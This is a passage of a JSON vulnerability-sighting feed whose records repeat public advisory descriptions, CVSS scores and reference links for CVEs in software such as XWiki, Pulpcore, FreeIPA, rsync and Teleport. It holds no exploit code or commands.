configuration. This issue arises from Apache's mod_proxy not properly unsetting headers because of restrictions on underscores in HTTP headers, allowing authentication through a malformed header. This flaw impacts all active Satellite deployments (6.13, 6.14 and 6.15) which are using Pulpcore version 3.0+ and could potentially enable unauthorized users to gain administrative access.\n\ud83d\udccf Published: 2024-09-04T13:41:48.872Z\n\ud83d\udccf Modified: 2025-06-17T08:38:14.465Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6335\n2. https://access.redhat.com/errata/RHSA-2024:6336\n3. https://access.redhat.com/errata/RHSA-2024:6337\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-7923\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2305718", "creation_timestamp": "2025-06-17T09:41:32.000000Z"}, {"uuid": "cc56e0e4-29cf-4c5b-bcf0-c52a575bb494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C29W-QQ4M-2GCV", "type": "seen", "source": "Telegram/F2G63fMNgyZcc0oNt6XGHExAkvTr9kUyS9C9Ki-AIDnnQ5g", "content": "", "creation_timestamp": "2026-04-21T21:27:12.000000Z"}, {"uuid": "2ed22ff2-d1c3-47e1-a192-bed7c785e4eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MVP5-QX9C-C3FV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49584\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. In XWiki Platform versions 10.9 through 16.4.6, 16.5.0-rc-1 through 16.10.2, and 17.0.0-rc-1, the title of every single page whose reference is known can be accessed through the REST API as long as an XClass with a page property is accessible, this is the default for an XWiki installation. This allows an attacker to get titles of pages whose reference is known, one title per request. This doesn't affect fully private wikis as the REST endpoint checks access rights on the XClass definition. The impact on confidentiality depends on the strategy for page names. By default, page names match the title, so the impact should be low but if page names are intentionally obfuscated because the titles are sensitive, the impact could be high. This has been fixed in XWiki 16.4.7, 16.10.3 and 17.0.0 by adding access control checks before getting the title of any page.\n\ud83d\udccf Published: 2025-06-13T17:21:33.575Z\n\ud83d\udccf Modified: 2025-06-13T17:21:33.575Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-mvp5-qx9c-c3fv\n2. https://github.com/xwiki/xwiki-platform/commit/ee642f973a7c95d2d146fe03c81bcdee1871f4ec\n3. https://jira.xwiki.org/browse/XWIKI-22736", "creation_timestamp": "2025-06-13T17:38:04.000000Z"}, {"uuid": "7109c1d9-443b-448d-8f03-c21eeeae6150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3MQ-F375-5VGH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18299", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43866\n\ud83d\udd25 CVSS Score: 1.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: vantage6 is an open-source infrastructure for privacy preserving analysis. The JWT secret key in the vantage6 server is auto-generated unless defined by the user. The auto-generated key is a UUID1, which is not cryptographically secure as it is predictable to some extent. This vulnerability is fixed in 4.11.0.\n\ud83d\udccf Published: 2025-06-12T18:04:57.649Z\n\ud83d\udccf Modified: 2025-06-13T14:06:06.347Z\n\ud83d\udd17 References:\n1. https://github.com/vantage6/vantage6/security/advisories/GHSA-m3mq-f375-5vgh", "creation_timestamp": "2025-06-13T14:35:48.000000Z"}, {"uuid": "f9ff4776-1905-4293-95ee-e6fb1858b5f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9875-CW22-F7CX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18306", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49581\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. Any user with edit right on a page (could be the user's profile) can execute code (Groovy, Python, Velocity) with programming right by defining a wiki macro. This allows full access to the whole XWiki installation. The main problem is that if a wiki macro parameter allows wiki syntax, its default value is executed with the rights of the author of the document where it is used. This can be exploited by overriding a macro like the children macro that is used in a page that has programming right like the page XWiki.ChildrenMacro and thus allows arbitrary script macros. This vulnerability has been patched in XWiki 16.4.7, 16.10.3 and 17.0.0 by executing wiki parameters with the rights of the wiki macro's author when the parameter's value is the default value.\n\ud83d\udccf Published: 2025-06-13T16:09:22.997Z\n\ud83d\udccf Modified: 2025-06-13T16:09:22.997Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-9875-cw22-f7cx\n2. https://github.com/xwiki/xwiki-platform/commit/c99d501ed41cbee6a3c02ff927714531570789de\n3. https://jira.xwiki.org/browse/XWIKI-22760", "creation_timestamp": "2025-06-13T16:37:08.000000Z"}, {"uuid": "3a6b07c6-d23b-4732-9cb9-88fdaeaadfd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7H3J-592V-JCRP", "type": "seen", "source": "Telegram/F2G63fMNgyZcc0oNt6XGHExAkvTr9kUyS9C9Ki-AIDnnQ5g", "content": "", "creation_timestamp": "2026-04-21T21:27:12.000000Z"}, {"uuid": "2acb806c-404d-4f19-a9c3-894464f81fda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9G37-PGJ9-WRHC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18442", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4748\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L)\n\ud83d\udd39 Description: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Erlang OTP (stdlib modules) allows Absolute Path Traversal, File Manipulation. This vulnerability is associated with program files lib/stdlib/src/zip.erl and program routines zip:unzip/1, zip:unzip/2, zip:extract/1, zip:extract/2\u00a0unless the memory option is passed.\n\nThis issue affects OTP from OTP 17.0 until OTP\u00a028.0.1, OTP\u00a027.3.4.1 and OTP\u00a026.2.5.13, corresponding to stdlib from 2.0 until 7.0.1, 6.2.2.1 and 5.2.3.4.\n\ud83d\udccf Published: 2025-06-16T11:00:54.643Z\n\ud83d\udccf Modified: 2025-06-16T11:00:54.643Z\n\ud83d\udd17 References:\n1. https://github.com/erlang/otp/security/advisories/GHSA-9g37-pgj9-wrhc\n2. https://www.erlang.org/doc/system/versions.html#order-of-versions\n3. https://github.com/erlang/otp/pull/9941", "creation_timestamp": "2025-06-16T11:39:57.000000Z"}, {"uuid": "d18495ff-03c8-498e-b63f-4cf96bbdb97d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G8QW-MGJX-RWJR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-5689\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in the temporary user record that authd uses in the pre-auth NSS. As a result, a user login for the first time will be considered to be part of the root group in the context of that SSH session.\n\ud83d\udccf Published: 2025-06-16T11:37:12.230Z\n\ud83d\udccf Modified: 2025-06-16T11:37:12.230Z\n\ud83d\udd17 References:\n1. https://github.com/ubuntu/authd/security/advisories/GHSA-g8qw-mgjx-rwjr", "creation_timestamp": "2025-06-16T12:42:54.000000Z"}, {"uuid": "9063aa32-d02d-4a26-a57e-320d5a5d140b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRFF-Q8QJ-XVG8", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18476", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-42445\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:H)\n\ud83d\udd39 Description: Gradle is a build tool with a focus on build automation and support for multi-language development. In some cases, when Gradle parses XML files, resolving XML external entities is not disabled. Combined with an Out Of Band XXE attack (OOB-XXE), just parsing XML can lead to exfiltration of local text files to a remote server. Gradle parses XML files for several purposes. Most of the time, Gradle parses XML files it generated or were already present locally. Only Ivy XML descriptors and Maven POM files can be fetched from remote repositories and parsed by Gradle. In Gradle 7.6.3 and 8.4, resolving XML external entities has been disabled for all use cases to protect against this vulnerability. Gradle will now refuse to parse XML files that have XML external entities.\n\ud83d\udccf Published: 2023-10-06T13:52:02.982Z\n\ud83d\udccf Modified: 2025-06-16T17:08:05.678Z\n\ud83d\udd17 References:\n1. https://github.com/gradle/gradle/security/advisories/GHSA-mrff-q8qj-xvg8\n2. https://github.com/gradle/gradle/releases/tag/v7.6.3\n3. https://github.com/gradle/gradle/releases/tag/v8.4.0\n4. https://security.netapp.com/advisory/ntap-20231110-0006/", "creation_timestamp": "2025-06-16T17:37:48.000000Z"}, {"uuid": "187b1074-998d-4513-8649-2ee566f03229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8385", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18474", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12747\n\ud83d\udd25 CVSS Score: 5.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation.\n\ud83d\udccf Published: 2025-01-14T17:39:16.031Z\n\ud83d\udccf Modified: 2025-06-16T17:24:34.857Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2600\n2. https://access.redhat.com/errata/RHSA-2025:7050\n3. https://access.redhat.com/errata/RHSA-2025:8385\n4. https://access.redhat.com/security/cve/CVE-2024-12747\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2332968\n6. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-06-16T17:37:46.000000Z"}, {"uuid": "7ed246b3-7efe-4625-b6d5-9a36975e0d2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2600", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18474", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12747\n\ud83d\udd25 CVSS Score: 5.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation.\n\ud83d\udccf Published: 2025-01-14T17:39:16.031Z\n\ud83d\udccf Modified: 2025-06-16T17:24:34.857Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2600\n2. https://access.redhat.com/errata/RHSA-2025:7050\n3. https://access.redhat.com/errata/RHSA-2025:8385\n4. https://access.redhat.com/security/cve/CVE-2024-12747\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2332968\n6. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-06-16T17:37:46.000000Z"}, {"uuid": "3be38fe3-0965-4c9a-bc85-9a8563ce9ca5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GW5-JCCF-6HXW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18654", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-29198\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. It possible to achieve Service Side Request Forgery (SSRF) via the Demo request endpoint if Proxy Base URL has not been set. Upgrading to GeoServer 2.24.4, or 2.25.2, removes the TestWfsPost servlet resolving this issue.\n\ud83d\udccf Published: 2025-06-10T14:27:39.485Z\n\ud83d\udccf Modified: 2025-06-17T19:12:00.664Z\n\ud83d\udd17 References:\n1. https://github.com/geoserver/geoserver/security/advisories/GHSA-5gw5-jccf-6hxw\n2. https://osgeo-org.atlassian.net/browse/GEOS-11390\n3. https://osgeo-org.atlassian.net/browse/GEOS-11794", "creation_timestamp": "2025-06-17T19:39:30.000000Z"}, {"uuid": "b46e40cb-8300-4832-b1b5-5e969ece73d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8906", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18576", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7923\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An authentication bypass vulnerability has been identified in Pulpcore when deployed with Gunicorn versions prior to 22.0, due to the puppet-pulpcore configuration. This issue arises from Apache's mod_proxy not properly unsetting headers because of restrictions on underscores in HTTP headers, allowing authentication through a malformed header. This flaw impacts all active Satellite deployments (6.13, 6.14 and 6.15) which are using Pulpcore version 3.0+ and could potentially enable unauthorized users to gain administrative access.\n\ud83d\udccf Published: 2024-09-04T13:41:48.872Z\n\ud83d\udccf Modified: 2025-06-17T08:38:14.465Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6335\n2. https://access.redhat.com/errata/RHSA-2024:6336\n3. https://access.redhat.com/errata/RHSA-2024:6337\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-7923\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2305718", "creation_timestamp": "2025-06-17T09:41:32.000000Z"}, {"uuid": "c648effc-8aa0-4375-837e-2cf44e43065a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GRMH-WW4V-5CGJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18681", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49149\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N)\n\ud83d\udd39 Description: Dify is an open-source LLM app development platform. In version 1.2.0, there is insufficient filtering of user input by web applications. Attackers can use website vulnerabilities to inject malicious script code into web pages. This may result in a cross-site scripting (XSS) attack when a user browses these web pages. At time of posting, there is no known patched version.\n\ud83d\udccf Published: 2025-06-17T22:34:24.515Z\n\ud83d\udccf Modified: 2025-06-17T22:34:24.515Z\n\ud83d\udd17 References:\n1. https://github.com/langgenius/dify/security/advisories/GHSA-grmh-ww4v-5cgj", "creation_timestamp": "2025-06-17T23:42:06.000000Z"}, {"uuid": "75cfa737-4a58-463f-b7b9-96a7c6118f87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CQV-PJ7F-PWPC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18680", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49825\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Teleport provides connectivity, authentication, access controls and audit for infrastructure. Community Edition versions before and including 17.5.1 are vulnerable to remote authentication bypass. At time of posting, there is no available open-source patch.\n\ud83d\udccf Published: 2025-06-17T21:43:18.288Z\n\ud83d\udccf Modified: 2025-06-17T21:43:18.288Z\n\ud83d\udd17 References:\n1. https://github.com/gravitational/teleport/security/advisories/GHSA-8cqv-pj7f-pwpc", "creation_timestamp": "2025-06-17T22:40:59.000000Z"}, {"uuid": "88d0f85e-d7ad-4169-8979-d9abeec54093", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WCG-W3C4-48R7", "type": "published-proof-of-concept", "source": "Telegram/ITN0hTjNGfPMK-REHkV5qJBsGo4t4-tf1bJT5aod5DHh0UQ", "content": "", "creation_timestamp": "2026-04-21T23:30:36.000000Z"}, {"uuid": "cb33f32b-2e7d-4017-a58c-69ecba8642e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9162", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18574", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48797\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in GIMP when processing certain TGA image files. If a user opens one of these image files that has been specially crafted by an attacker, GIMP can be tricked into making serious memory errors, potentially leading to crashes and causing a heap buffer overflow.\n\ud83d\udccf Published: 2025-05-27T14:04:57.389Z\n\ud83d\udccf Modified: 2025-06-17T09:16:10.927Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9162\n2. https://access.redhat.com/errata/RHSA-2025:9165\n3. https://access.redhat.com/security/cve/CVE-2025-48797\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2368558", "creation_timestamp": "2025-06-17T09:41:29.000000Z"}, {"uuid": "3c27aa5a-2efc-45ab-ad18-a1844da4c72e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9185", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18594", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4404\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A privilege escalation from host to domain vulnerability was found in the FreeIPA project. The FreeIPA package fails to validate the uniqueness of the `krbCanonicalName` for the admin account by default, allowing users to create services with the same canonical name as the REALM admin. When a successful attack happens, the user can retrieve a Kerberos ticket in the name of this service, containing the admin@REALM credential. This flaw allows an attacker to perform administrative tasks over the REALM, leading to access to sensitive data and sensitive data exfiltration.\n\ud83d\udccf Published: 2025-06-17T13:39:17.945Z\n\ud83d\udccf Modified: 2025-06-17T14:30:18.658Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9185\n2. https://access.redhat.com/errata/RHSA-2025:9187\n3. https://access.redhat.com/errata/RHSA-2025:9189\n4. https://access.redhat.com/errata/RHSA-2025:9193\n5. https://access.redhat.com/errata/RHSA-2025:9194\n6. https://access.redhat.com/security/cve/CVE-2025-4404\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2364606", "creation_timestamp": "2025-06-17T14:39:59.000000Z"}, {"uuid": "fbcbe23a-4b0c-4e2e-afb4-56da49d23869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9GW-HVQQ-F33R", "type": "seen", "source": "Telegram/CTUi-siovRZPMXoRCribr6B1ZCHTTpPI8Ha33jZ7j7d94jM", "content": "", "creation_timestamp": "2026-04-21T23:30:54.000000Z"}, {"uuid": "ed54ccf7-2407-4893-af61-71f90ec5ea3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5RG-PXX7-R2HJ", "type": "published-proof-of-concept", "source": "Telegram/ITN0hTjNGfPMK-REHkV5qJBsGo4t4-tf1bJT5aod5DHh0UQ", "content": "", "creation_timestamp": "2026-04-21T23:30:36.000000Z"}, {"uuid": "a541bcc4-eebd-486a-b060-2a1e61a81988", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F7GQ-H8JV-H3CQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18591", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4754\n\ud83d\udd25 CVSS Score: 2.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Insufficient Session Expiration vulnerability in ash-project ash_authentication_phoenix allows Session Hijacking. This vulnerability is associated with program files lib/ash_authentication_phoenix/controller.ex.\n\nThis issue affects ash_authentication_phoenix until 2.10.0.\n\ud83d\udccf Published: 2025-06-17T14:31:37.006Z\n\ud83d\udccf Modified: 2025-06-17T14:31:37.006Z\n\ud83d\udd17 References:\n1. https://github.com/team-alembic/ash_authentication_phoenix/security/advisories/GHSA-f7gq-h8jv-h3cq\n2. https://github.com/team-alembic/ash_authentication_phoenix/pull/634", "creation_timestamp": "2025-06-17T14:39:56.000000Z"}, {"uuid": "3bb7b48a-ef0d-48ad-99c8-c62286576fd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GPH2-J4C9-VHHR", "type": "published-proof-of-concept", "source": "Telegram/ITN0hTjNGfPMK-REHkV5qJBsGo4t4-tf1bJT5aod5DHh0UQ", "content": "", "creation_timestamp": "2026-04-21T23:30:36.000000Z"}, {"uuid": "d1298eba-53a3-4521-8e97-3113132b6241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6336", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18576", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7923\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An authentication bypass vulnerability has been identified in Pulpcore when deployed with Gunicorn versions prior to 22.0, due to the puppet-pulpcore configuration. This issue arises from Apache's mod_proxy not properly unsetting headers because of restrictions on underscores in HTTP headers, allowing authentication through a malformed header. This flaw impacts all active Satellite deployments (6.13, 6.14 and 6.15) which are using Pulpcore version 3.0+ and could potentially enable unauthorized users to gain administrative access.\n\ud83d\udccf Published: 2024-09-04T13:41:48.872Z\n\ud83d\udccf Modified: 2025-06-17T08:38:14.465Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6335\n2. https://access.redhat.com/errata/RHSA-2024:6336\n3. https://access.redhat.com/errata/RHSA-2024:6337\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-7923\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2305718", "creation_timestamp": "2025-06-17T09:41:32.000000Z"}, {"uuid": "8fad1358-f146-4ddc-b1cf-99647ad036f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J29M-P99G-7HPV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18531", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-21646\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Azure uAMQP is a general purpose C library for AMQP 1.0. The UAMQP library is used by several clients to implement AMQP protocol communication.  When clients using this library receive a crafted binary type data, an integer overflow or wraparound or memory safety issue can occur and may cause remote code execution.  This vulnerability has been patched in release 2024-01-01.\n\ud83d\udccf Published: 2024-01-09T00:04:53.587Z\n\ud83d\udccf Modified: 2025-06-16T19:52:58.874Z\n\ud83d\udd17 References:\n1. https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-j29m-p99g-7hpv\n2. https://github.com/Azure/azure-uamqp-c/commit/12ddb3a31a5a97f55b06fa5d74c59a1d84ad78fe", "creation_timestamp": "2025-06-16T20:37:14.000000Z"}, {"uuid": "01bfeff3-6656-42cc-809a-80fa088b51d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2146", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18479", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-43788\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system.\n\ud83d\udccf Published: 2023-10-10T12:26:08.737Z\n\ud83d\udccf Modified: 2025-06-16T17:04:22.032Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2146\n2. https://access.redhat.com/errata/RHSA-2024:2217\n3. https://access.redhat.com/errata/RHSA-2024:2974\n4. https://access.redhat.com/errata/RHSA-2024:3022\n5. https://access.redhat.com/security/cve/CVE-2023-43788\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2242248", "creation_timestamp": "2025-06-16T17:37:54.000000Z"}, {"uuid": "86990462-3e56-4a37-a0e4-4a4d375037ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3022", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18479", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-43788\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A 